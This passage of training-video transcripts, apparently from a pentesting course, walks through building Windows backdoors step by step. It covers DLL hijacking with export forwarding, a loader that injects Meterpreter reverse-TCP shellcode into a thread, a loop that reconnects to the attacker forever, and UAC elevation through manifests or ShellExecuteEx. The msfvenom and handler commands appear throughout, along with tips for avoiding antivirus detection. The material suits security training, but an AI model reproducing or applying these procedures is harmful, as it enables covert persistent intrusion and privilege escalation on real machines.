would be there. And let's find user32.dll. Let's copy this out. And we can copy this inside our working directory, right? This is basically the same DLL really, so it wouldn't matter, but we've copied it. Now we can go to this working directory. I have already downloaded the template.c and the template.h from the Metasploit's GitHub repo, which I have shown you in the last video. Already copied these in here as well. Now let's do the following. Let's first use DLL export.py, take user32, then name the new DLL to which everything is forwarded. Let's say user32 underscore real.dll, and we see that the parsing is done perfectly well, right? So let's store this inside template.def, which we will use later. Now let's open up the template.c from the Metasploit code. Let's remove this line. Now we are in 64-bit mode, so in the context we would just require RIP. This part is redundant, and we'll remove the exit thread as well. Let's save this. Now let's open up template.h. We would need to paste our 64-bit shellcode in here. So let me open up a new tab and generate the 64-bit shellcode. So msf venom Windows x64 Meterpreter reverse TCP L host equals 192.168.10.10, L port equals 9999. The output format is C. And in the meantime, we can also set up Metasploit. Use exploit multi-handler, set payload to Windows x64 Meterpreter reverse TCP, set L host to 192.168.10.10, set L port to 9999, set exit on session to false, exploit -j. Right, so the handler is set up. My mistake, forgot the -p option. Right, now in the meantime, let me take you to our 64-bit application. I have created a console application 2.exe.local folder for the redirection, and I've copied the real system user32.dll into this folder and renamed it user32_real. Right, now this 64-bit application does exactly the same thing, prints hello world. So in the meantime, our shell code is ready, 64-bit one. Let's copy this out and paste it inside template.h. Perfect. Now compile this. I'm going to use the W64 Ming W32 GCC. Take in template.c, do a -o, template.dll. This should be shared, and we would have the template.def file given in as well. There we go. Now if you look at template.dll, we'll find it's a PE32 plus DLL. Right, fantastic. Okay, so now let's actually go to the Windows application. I'm using the same name as in previous demos, but this one is a 64-bit application, console application 2. And by default, if you run it, of course, it just pops up hello world. I've created a .local redirection for testing, inside which I've put in the real user32 and renamed it to user32_real. Now I can go back in here, copy out my template.dll, go to this directory, paste it, rename this to user32, go back in here, run the app, application works fine, and if I go in here, I get my Meterpreter session inside run DLL32. Right, if I do a sysinfo, you can clearly see basically x64, and the Meterpreter is also an x64 one. So you could do a PS, you could do a get UID, get PID 1260, and if you were to scroll up, you would actually find that 1260 is inside run DLL 32 x86 underscore 64-bit, right? Fantastic. So this is how we can go ahead and create a 64-bit Meterpreter using DLL hijacking and forwarding with each other, right? Hope you guys enjoyed this video, and if you have, please do recommend Pentester Academy to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the network pen testing series at Pentester Academy. Now, in the last couple of videos, when we looked at forwarding functions in DLLs, we saw how we could eventually execute our shellcode within run DLL 32, right? But unfortunately, this ends up creating a new process, which is essentially a very noisy process, right? A lot of AVs, because security vendors follow Metasploit closely, might look for run DLL 32s being spawned and could probably flag that as an attempt of DLL hijacking, right? Making it very, very easy to catch. And in most cases, I mean, very few probability of run DLL 32 actually running on the system. So the question arises, why not run our shellcode as a thread of the existing process rather than spawning a new process, right? So unfortunately, there isn't any code available in the framework to the best of my knowledge, which we could use readily. So what I've done is I've created my own code, very simple program actually. So what does it do? Well, let me run you through it. Now this is the DLL main function which we've discussed in previous videos. It's very, very simple. In the case where we were using the Metasploit templates, we were calling execute payload, which in turn would go ahead and create a process, run DLL 32 in suspended mode, copy the shellcode, change the context, and run the shellcode, right? Something which is called process hollowing. Now, what we will do in this case is really create a thread which is going to run as part of the existing process. Now, create thread is what we are going to use, and the thread function which we will call is defined up here. And all this thread function does is it allocates memory, copies our shellcode to this memory, and then finally runs our shellcode in memory, right? Keep in mind that we call virtual alloc ex and tell it to assign read, write, execute permissions on the page, because we'll have to copy the shellcode and then run it. And then we use write process memory to actually do the copying, right? Pretty simple. Now the shellcode I am actually using is generated by the Metasploit framework, and this is nothing but a Windows Meterpreter reverse TCP, and I have put in the L host and L port based on the attacker machine's config, right? So I already have everything in here. Now let me go ahead and compile this into a DLL. Now we will need to use DLL forwarding, and I'm going to use the exact same program which we have used in the last couple of videos. Let me go there, which is really the console application 2, right? All this does is throws up a little hello world, and based on what we've seen before, this uses user 32, which of course you could verify once again by opening this with, let's say, CFF Explorer. Go to the import directory. You can see this uses user 32 and the function being used is message box A, right? Now going back, I'm going to go ahead and create a DLL which will forward all of user32's functions to another DLL, right? So I'm going to use my DLL export dump.py again, which we've used over and over again in the last couple of videos. The new DLL will be called user32_real.dll. Let's see the output. So just as we expect, we see that the functions are forwarded to this new DLL which we've created. So let me dump this inside a def file. Let's call this template.def. Now let me compile this program into a DLL. Let me call this thread.dll. This is a shared library, and template.def is also an input. There we go. Right. Now let's do the actual attack, but before that we'll have to set up Metasploit. So use exploit multi-handler, set payload to Windows Meter Preter reverse TCP, set lhost to 192.168.10.10 and set lport to 9000, and then let's set exit on session to false so we can receive multiple incoming connections, and then we run exploit-j. There we go. Now let's go to the Windows machine. If I refresh this directory, I'll find my thread.dll in here. Let me copy this, and I'm going to copy this to the .local redirection directory, right? Again, if this is confusing, please go back to the previous videos on DLL hijacking. Now I'm going to rename this to user32. Awesome. And I'm going to go back in here and let me run console application. We get a hello world, and if I go back, we also get a Meterpreter session. Now notice the original program comfortably is running at this point, right? The program does not cease to exist or stop in any way. And I can access my Meterpreter session, right, parallelly. And I can verify I'm in the same process. Let me do a get PID 2480. Let me do a PS. And if I quickly look for 2480, here I am. I am running as console application 2.exe, right? Of course, there is a chance this program may exit, so you might quickly want to migrate to some other process. We can leave that as an exercise. That isn't the point here, right? Now, notice something interesting. Let's say the program is still running, which it is because we haven't pressed an OK here. But if I exit Meterpreter, if you notice the program exits as well, right? This is not desirable, right? And the reason why this is really happening is because the exit function for the payload is set to process. This basically means it's just calling an exit process. We don't want this. If we are running a thread, we pretty much want the exit process to be thread, right? So how do we do this? So I'm going to stop all the jobs using jobs-k, and I'm then going to set the exit function to thread. And now again, let me run exploit-j. Now I'm going to go back to my Windows machine. Let me run this. There we go, it's up and running. We get a Meterpreter session as expected. Let me go into the session. Running as expected. Now when I hit exit, you would actually notice that the program continues to run. There is no problem at all. It's comfortably running, right? Fantastic. So this is how, by using thread, we can ensure A, the program continues to run, forwarding all requests to the correct DLL. And B, when we exit Meterpreter, the program still continues to run, right? Let's click on OK and exit this. Awesome. So hope you enjoyed this video, and if you have, please do recommend Pen Tester Academy to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Hello all, welcome to the network pen testing series at Pen Tester Academy. Now in this video, we will look at how we can get a 64-bit Meterpreter running inside of the thread when we do function forwarding with our DLL. So the process is exactly the same, it isn't much different. So let's quickly go through it. So here is my thread template, which is pretty much exactly the same as in the last video, right? We create a thread, we copy the shellcode to memory into a new memory region, which is read, write, execute, and then we run it, right? The first step, of course, is to create our shellcode. So we can do an msf venom -p Windows x64 Meterpreter reverse TCP lhost equals 192.168.10.10 lport equals 9000 and the output format is C. And while we get this, we can set the exploit handler, use exploit multi-handler, set payload to Windows x64 Meterpreter reverse TCP, set lhost to 192.168.10.10, set lport to 9000, and as in the last function, last example, set exit function to thread, exit on session to false, exploit -j. There you go. Right, so we have our handler up and running. We also have our shellcode delivered to us. Because it's part of the DLL, we really aren't bothered about nulls and all of that stuff, right? Doesn't matter. This isn't part of an exploit. I always have a painfully tough time copying the shellcode. This is something wrong with my mouse. Okay, so I'm going to go back in here, paste this shellcode. Let's actually start pasting on a new line. It's much better formatted. And I'm also going to add my little metasploit command used to generate the shellcode. This is so that later on, if any of you guys forget these options, you could just quickly look at it and figure it out. There we go. Right, looks okay. Now I've already copied my 64-bit user 32 from the Windows machine over here. This is the real user 32, and I can use DLL export.py, give it user 32, user 32 underscore real.dll. All of this should be very familiar at this point. If not, you should probably go ahead and look at some of the previous videos. Now let me drop this inside a def file. Let's call it template.def. You could pretty much call it anything you like. And now let's compile this into a 64-bit DLL. thread template -o. Let's call this thread.dll. It's a static library. Oh my god, I'm sorry. It's a shared. And then let's also mention the definition file. There we go. Now we should have thread.dll in the current directory. Let's go to Windows. We refresh this view. Let's look at this inside CFF Explorer. I can go to the export directory, right, and we can find all of these exports in here. So everything looks perfect, just the way we want it. And I can now copy this thread.dll and go to my application directory. Now this is the same application directory which we used in previous videos, the x64 one, right? And let me paste this in here and rename this to user32. Let's go back in here. Let's run the application. Right, the application is up and running. Let's go to Metasploit, and here you go. You have a session waiting for you. And you can clearly see this is a 64-bit Meterpreter, right? What you could also do is go ahead and verify your PID and UID. So 1796, and if you look at this, you clearly see that 1796 is your 64-bit console application 2.exe, which is pretty much still happily running. And you could hit an exit in here, and your application would continue to run without any problems, right? Awesome. So hopefully you guys enjoyed this video, and if you're having fun at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead.
Hello all, welcome to the network pentesting series at Pentester Academy. In this video, we will look at an interesting concept which I name perpetual Meterpreter. Now, as a pen tester, a lot of times when you use Meterpreter's payload as a binary and you run it on the remote machine, you would find that if you lose connectivity or hit exit, you end up losing the Meterpreter connection. Now, what if we could ensure that when we run Meterpreter as an exe, anytime there is loss of connectivity, then it automatically connects back to us perpetually, right? So this is what we are going to explore in this video. So I have my attacker machine here running Metasploit. And here is my victim machine, which also has Visual Studio installed, through which I have gone ahead and compiled this program. Let me explain this program. Now in shellcode.h, I have pasted my shellcode inside a variable. And this shellcode was generated using MSF Venom -p Windows x64 Meterpreter reverse TCP. And then we have lhost 192.168.10.10, lport 9000, and the exit function is thread. The exit function, of course, is important simply because we do not want the process to exit when the very first Meterpreter payload exits for whatever reason. Now let's go to main.cpp. Now in main, here is what I've done. I first call free console so that we don't get any nasty GUI window, and then I have a while one loop. Now what this loop does is it creates a thread, and I'll get into the thread function in just a bit, which gets called when the thread gets created. And after that we call wait for single object, which just waits pretty much for the thread we created about to exit. After that we close the handle and then go back in the loop to create the next thread. Now what happens in this thread function? Now in this thread function, what we do is we allocate memory for the shellcode. We copy the shellcode to that memory location once we get that space, and then we basically excuse me, run that shellcode, right? Of course, this return one is probably never hit. The shellcode runs within a thread, the thread exits, and then we go back and create a new one. Fantastic. So you are going to receive the source code and the binary. Keep in mind the binary, of course, would have the attacker's IP address hard-coded. So you can always download Visual Studio. There is now even a free community version apart from the Express version. And with that, you can build this project. So let me rebuild the solution. And then I can go to the page, and here it is. Now before I run it, I need to go back to my attacker machine and set everything up in Metasploit. So use exploit multi-handler, set the payload to Windows x64 Meterpreter reverse TCP. You know, to set the L host to 192.168.10.10. That IP address has already been allocated to my interface. The L port is going to be 9000, and then set exit on session to false, and then we are going to set the exit function to thread. Let's hit exploit now, wait for it. My mistake, should hit exploit -J for exit on session false, so that we run it as a background job. Now we go back to the Windows machine and let's run this. If you notice, we barely noticed anything, and we have a Meterpreter session. Now the moment I hit an exit, right, you'll actually see that the next Meterpreter session is received and connects back to us. Let's exit this. There you go, we have a new Meterpreter session. Exit this. If you have a new one, right? And as you can clearly see, this is now going to be completely perpetual. Now keep in mind that the reason I'm giving you the source code is so that you can play and tinker around with it. If you know a little bit of C, of course, you can extend it very trivially to do other things. As an example, you could have 10 threads at any given time, and when just one thread exits, you recreate it. So that way you have 10 concurrent connections at any given time. And really, sky is the limit, you know, pretty much once you have the source code. Fantastic. So that's all I had in mind for this video. If you've been enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we will look at pen testing Windows endpoints and look at how we can run our binaries with escalation using two techniques. One is manifest files and the other is shell execute ex. So why do we need this in the first place? Now, if you go through Windows UAC documentation, what you will actually find that admin is not really admin. And what I mean by that is, even if you're logged in, or rather the victim is logged in to an admin account, most of the operations done by the victim would be done as a standard user with low privileges. Only when operations which require higher privileges are initiated, at that time Windows throws out the UAC prompt so that the admin knows that now he's about to do privileged operations. And only after that does he get really high privileges. Now, let's go ahead and prove this. So I have my attacker machine here, and drawing from the last video, if you recall, where we created the shellcode launcher in the thread, I have this in here as well. Let me rebuild my solution. There we go. And here is the 64-bit binary. Now I'm going to go to the attacker machine and set up the payload handler. I'm going to set exit on session to false. Set exit function to thread. And now we are having our handler up and running. Now let me execute the program as I have done in the previous video without doing anything else but just clicking it. There we go, we've clicked it. If we go to the attacker machine, we'll actually find we have a Meterpreter session. And if I connect to that session and do a get UID, you'll find I'm security tube, which is actually an admin account on the remote machine. Now, if I do get privs though, you'll actually find that I hardly have any privileges. Just the shutdown privilege, change notify, and undock. Come on, that isn't anything. So where is the problem? Well, at this point we are still running as a standard user even though I'm logged in to an admin account. Let me first kill the shellcode launcher. Now, if I go ahead and launch this as an admin, run as admin, we get the UAC. And now when I do the yes, if I go back, I have another Meterpreter session. If you notice, I'm still the same user, but now if I do get privs, you will actually find I have a ton of privileges, right? Pretty much all the privs available to admin, right? Debug priv, security priv, blah, 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 backup, restore, so many things. So you can clearly see that without basically doing this privilege escalation, the admin account is pretty much useless to us, right? Now, there are a lot of UAC bypass examples which we've seen in previous videos, but in this video, we will focus on how we can make a binary demand for escalated privileges when it runs the first time. Okay, so let's go back to Visual Studio. It's going to close shellcode launcher again. On the attacker machine, now as you can see, we have no sessions left. Now, the first technique involves the use of what is called a manifest file, which is actually embedded in the resource section of most executables, which may have been combined by Visual Studio and maybe other compilers as well. Now, let's go ahead and analyze this manifest file using resource tuner, which we introduced in a previous video. So let's open up shellcode launcher. Now if I click on the manifest, you will actually see that requested execution level you can see as invoker, right? This doesn't help. We need the highest privileges possible, and if possible admin. So how do we do that? Well, we can modify this and basically request for highest privileges or as admin. Now what I'm going to do is, rather than just modify this, let's also take up the case where the manifest file isn't present, right? So let me delete this manifest and save the binary. Now let me refresh the binary. You'll notice we don't have any manifest file. So I'm going to click add resource to it, and the resource type I'm going to select is manifest. Click OK. It asks you whether this is a theme manifest, a UAC manifest, or a compatibility one. We're just interested in the UAC manifest. Click next. Now if you notice in the trust info section, it says as invoker highest available require administrator, right? You can do require administrator or highest available. Now it shows us the manifest file. When we hit finish, it goes ahead and adds it to the binary, which we can go ahead and ensure by hitting save. There we go. Now when I run this binary this time, there you go. If you notice, it immediately tells us that we need high privs. So I can now click yes to that. Now if I go back to my attacker machine, I have a new Meterpreter session. And you will notice I have all the privs up front. Fantastic, right? So if you manage to have the user run a binary, make sure that it is a binary which can give you the highest privileges possible. Now there are other techniques as well which you can do programmatically when you want to launch an executable with higher privileges. Also note this little shield which now appears because now Windows tells us that this program requires high privileges. So let me just quickly rebuild solution. Maybe I can just remove the program from here so I can overwrite it on disk. Let me rebuild the solution again. Of course, the shield would disappear now. Right now, if I want to escalate privileges, let me close this solution and let me open shell execute ex demo. Now what this does is the program in turn executes another program and basically goes ahead and forces a run as, so that we get prompted with the UAC. This is done with a Windows API called shell execute ex. So you can go ahead, make this a release candidate. I can add Win64 to this. And then build the solution. Go to the project page. Copy the binary. Take it to the shellcode launcher thread project. Copy it here. And now let me run this. And there you go. If you notice, it is now launching shellcode launcher thread.exe with high privileges. If I click yes, you will once again get a new Meterpreter session with hyperrefs. There you go, right? So you have both techniques available, and depending on the situation, you can select whichever one you would like. But keep in mind, it is very, very useful that you try to get as high a privileges as you can if you're able to run a binary. So that's all I had in mind for this video. As I mentioned in a previous video, you can download Resource Tuner. I think they have a 30-day free trial which you can use. Here is a screenshot and the link to the shell execute EX documentation on MSDN in case you would like to use it programmatically. That's all for this video. If you've been enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.